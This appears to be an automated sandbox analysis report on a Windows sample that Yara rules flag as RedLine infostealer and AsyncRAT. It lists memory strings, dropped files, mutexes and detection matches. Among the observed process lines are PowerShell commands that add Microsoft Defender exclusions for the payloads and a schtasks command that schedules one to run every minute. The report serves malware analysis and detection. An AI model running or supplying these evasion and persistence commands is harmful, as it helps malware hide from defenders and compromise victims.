Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1558493573.00000242E7F50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 0000000D.00000002.1756272246.00000136A6AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.1391396246.000001CD31DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CF801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, build.exe.1.dr	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, build.exe.1.dr	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: XClient.exe, 00000002.00000002.2585450577.00000000029AA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, XClient.exe, 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, mstc.exe.2.dr, XClient.exe.1.dr	String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, build.exe.1.dr	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000005.00000002.1410582309.000001CD41E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1540160968.00000242DF871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1728788196.000001369E490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49720 version: TLS 1.2

Source: C:\ProgramData\XClient.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\ProgramData\XClient.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.XClient.exe.12971a78.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Output.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: build.exe PID: 7492, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\ProgramData\build.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\ProgramData\build.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E473E2	2_2_00007FF886E473E2
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E41779	2_2_00007FF886E41779
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E49899	2_2_00007FF886E49899
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E42501	2_2_00007FF886E42501
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E46636	2_2_00007FF886E46636
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E4C680	2_2_00007FF886E4C680
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E410C5	2_2_00007FF886E410C5
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E49943	2_2_00007FF886E49943
Source: C:\ProgramData\XClient.exe	Code function: 2_2_00007FF886E42261	2_2_00007FF886E42261
Source: C:\ProgramData\build.exe	Code function: 3_2_024BE7B0	3_2_024BE7B0
Source: C:\ProgramData\build.exe	Code function: 3_2_024BDC90	3_2_024BDC90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886F230E9	8_2_00007FF886F230E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF886F030E9	13_2_00007FF886F030E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FF886F030E9	15_2_00007FF886F030E9
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Code function: 21_2_00007FF886E41779	21_2_00007FF886E41779
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Code function: 21_2_00007FF886E42261	21_2_00007FF886E42261
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Code function: 22_2_00007FF886E3178C	22_2_00007FF886E3178C
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Code function: 23_2_00007FF886E3178C	23_2_00007FF886E3178C

Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameImplosions.exe4 vs Output.exe

Source: Output.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.XClient.exe.12971a78.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Output.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: build.exe PID: 7492, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\ProgramData\build.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\ProgramData\build.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Output.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Output.exe, bqTJRK6Z5XVigGrdoqLGfpdgwtCtJXbz0SZhbQBtVf6UG0Qza4IQdaf8K8vtOgs4CSYosglZeqFD7UBN8YZS55r21xU6f1T01U.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.1.dr, lSFCDeEWkDjK.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.1.dr, XX3glvP8cBuW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.1.dr, XX3glvP8cBuW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: mstc.exe.2.dr, lSFCDeEWkDjK.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: mstc.exe.2.dr, XX3glvP8cBuW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: mstc.exe.2.dr, XX3glvP8cBuW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, lSFCDeEWkDjK.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, XX3glvP8cBuW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, XX3glvP8cBuW.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: XClient.exe.1.dr, F167lNHhHVQ1F1Js1bs45Kk9843.cs	Base64 encoded string: 'NpHyhXMu8mdUhGgJanuDQzqFhg79AGzGVtxWVTUZPUi2mW0A4h81EdyIgGWVxsbq', 'gKTh+xEOd4mxFBMUqEu2OMUqjjslod96OGY5OElB7tYUu50E+e80Kfpx64nwLc6v', 'jurRMQqguOvDR1JdhaRX7uei/mcvUM+GBOX0o8xICjO5T3QOJA6olinz2wm/wbHw'
Source: mstc.exe.2.dr, F167lNHhHVQ1F1Js1bs45Kk9843.cs	Base64 encoded string: 'NpHyhXMu8mdUhGgJanuDQzqFhg79AGzGVtxWVTUZPUi2mW0A4h81EdyIgGWVxsbq', 'gKTh+xEOd4mxFBMUqEu2OMUqjjslod96OGY5OElB7tYUu50E+e80Kfpx64nwLc6v', 'jurRMQqguOvDR1JdhaRX7uei/mcvUM+GBOX0o8xICjO5T3QOJA6olinz2wm/wbHw'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, F167lNHhHVQ1F1Js1bs45Kk9843.cs	Base64 encoded string: 'NpHyhXMu8mdUhGgJanuDQzqFhg79AGzGVtxWVTUZPUi2mW0A4h81EdyIgGWVxsbq', 'gKTh+xEOd4mxFBMUqEu2OMUqjjslod96OGY5OElB7tYUu50E+e80Kfpx64nwLc6v', 'jurRMQqguOvDR1JdhaRX7uei/mcvUM+GBOX0o8xICjO5T3QOJA6olinz2wm/wbHw'

Source: mstc.exe.2.dr, im9wFYLfycZyeMaz6yif3VopE01.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: mstc.exe.2.dr, im9wFYLfycZyeMaz6yif3VopE01.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, im9wFYLfycZyeMaz6yif3VopE01.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, im9wFYLfycZyeMaz6yif3VopE01.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe.1.dr, im9wFYLfycZyeMaz6yif3VopE01.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.1.dr, im9wFYLfycZyeMaz6yif3VopE01.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/24@2/4

Source: C:\Users\user\Desktop\Output.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\ProgramData\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\Yicxrg0OnE25m1fn
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Users\user\Desktop\Output.exe	Mutant created: \Sessions\1\BaseNamedObjects\YzlVy64o6s30kWaQN

Source: C:\ProgramData\XClient.exe

File created: C:\Users\user\AppData\Local\Temp\mstc.exe

Jump to behavior

Source: Output.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Output.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Output.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Output.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Output.exe	ReversingLabs: Detection: 55%
Source: Output.exe	Virustotal: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\Output.exe "C:\Users\user\Desktop\Output.exe"
Source: C:\Users\user\Desktop\Output.exe	Process created: C:\ProgramData\XClient.exe "C:\ProgramData\XClient.exe"
Source: C:\Users\user\Desktop\Output.exe	Process created: C:\ProgramData\build.exe "C:\ProgramData\build.exe"
Source: C:\ProgramData\build.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\mstc.exe C:\Users\user\AppData\Local\Temp\mstc.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\mstc.exe "C:\Users\user\AppData\Local\Temp\mstc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\mstc.exe "C:\Users\user\AppData\Local\Temp\mstc.exe"
Source: C:\Users\user\Desktop\Output.exe	Process created: C:\ProgramData\XClient.exe "C:\ProgramData\XClient.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process created: C:\ProgramData\build.exe "C:\ProgramData\build.exe"	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'	Jump to behavior
